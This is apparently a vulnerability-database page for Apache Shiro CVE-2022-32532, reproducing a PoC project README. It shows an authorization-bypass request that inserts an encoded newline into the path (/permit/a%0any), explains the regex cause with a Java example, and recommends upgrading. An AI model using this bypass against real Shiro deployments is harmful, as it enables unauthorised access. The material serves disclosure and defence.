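Related vulnerability
Title:
Apache Shiro security vulnerability
(CVE-2022-32532)
Description: Apache Shiro is a Java security framework from the Apache Software Foundation (USA) for authentication, authorization, cryptography and session management. Apache Shiro versions before 1.9.1 contain a security vulnerability that stems from RegexRequestMatcher being misconfigured on certain servlet containers.
Description
Apache Shiro CVE-2022-32532
Introduction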
# CVE-2022-32532
## about
This is a demo project that shows only one of the conditions for exploiting this vulnerability (CVE-2022-32532).
In fact, there are more ways to exploit it: whenever developers use `RegExPatternMatcher`, a bypass vulnerability is possible.
## introduce
Under the current configuration, verification of the `Token` request header is required; without it you do not have permission to access the interfaces under `/permit`.
This request can succeed:
```http request
GET /permit/any HTTP/1.1
Token: 4ra1n
```
Access is not allowed when there is no `Token` request header:
```http request
GET /permit/any HTTP/1.1
```
The check can be bypassed in a simple way in special but common configurations:
```http request
GET /permit/a%0any HTTP/1.1
```
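Why a regex chain pattern can miss the `%0a` path, shown with plain `java.util.regex`: without `Pattern.DOTALL`, `.` does not match line terminators, so `matches()` fails and the filter is never selected. This is an added example, not code from the demo project; the pattern `/permit/.*`, the class name and the sample paths are assumptions.

```java
import java.net.URLDecoder;
import java.nio.charset.StandardCharsets;
import java.util.List;
import java.util.regex.Pattern;

public class RegexChainMatchDemo {
    // Assumed chain pattern for the protected area; the demo's real pattern is not shown on the page.
    static final String CHAIN = "/permit/.*";

    // Default flags: '.' does not match line terminators, so matches() fails on such paths.
    static final Pattern DEFAULT_FLAGS = Pattern.compile(CHAIN);
    // Hardened form: DOTALL makes '.' match every character, line terminators included.
    static final Pattern WITH_DOTALL = Pattern.compile(CHAIN, Pattern.DOTALL);
    // Defence in depth: line terminators have no place in a decoded request path.
    static final Pattern LINE_TERMINATOR = Pattern.compile("[\\n\\r\\u0085\\u2028\\u2029]");

    // True when the chain (and therefore the token filter) would be applied to this path.
    static boolean filterApplies(Pattern p, String decodedPath) {
        return p.matcher(decodedPath).matches();
    }

    // True when the path should be refused before any pattern matching takes place.
    static boolean shouldReject(String decodedPath) {
        return LINE_TERMINATOR.matcher(decodedPath).find();
    }

    public static void main(String[] args) {
        // Constructed sample paths, written as they appear on the request line.
        List<String> rawPaths = List.of("/permit/any", "/permit/a%0any", "/permit/a%0dny", "/public/index");
        for (String raw : rawPaths) {
            // Assumption: the matcher is handed the percent-decoded path.
            String path = URLDecoder.decode(raw, StandardCharsets.UTF_8);
            System.out.printf("%-16s default=%-5b dotall=%-5b reject=%b%n",
                    raw,
                    filterApplies(DEFAULT_FLAGS, path),
                    filterApplies(WITH_DOTALL, path),
                    shouldReject(path));
        }
    }
}
```

For `/permit/a%0any` the default-flag pattern reports `false` (filter skipped) while the `DOTALL` pattern reports `true`; upgrading to Shiro 1.9.1 or later remains the fix for affected deployments.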
## reference
https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
This vulnerability is similar to Spring-Security [CVE-2022-22978](https://tanzu.vmware.com/security/cve-2022-22978)
Thanks to [bdemers](https://github.com/bdemers) (Apache Shiro PMC) and [chybeta](https://github.com/chybeta) (Security Researcher)
File snapshot
[4.0K] /data/pocs/db23da9a85e44e962b682b8bbf2f9dbd66066b0b
├── [1.3K] pom.xml
├── [1.1K] README.md
└── [4.0K] src
    └── [4.0K] main
        ├── [4.0K] java
        │   └── [4.0K] com
        │       └── [4.0K] example
        │           └── [4.0K] shirodemo
        │               ├── [ 608] DemoController.java
        │               ├── [1.1K] MyFilter.java
        │               ├── [1.5K] MyShiroFilterFactoryBean.java
        │               ├── [ 702] ShiroConfig.java
        │               └── [ 332] ShiroDemoApplication.java
        └── [4.0K] resources
            └── [   0] application.properties
7 directories, 8 files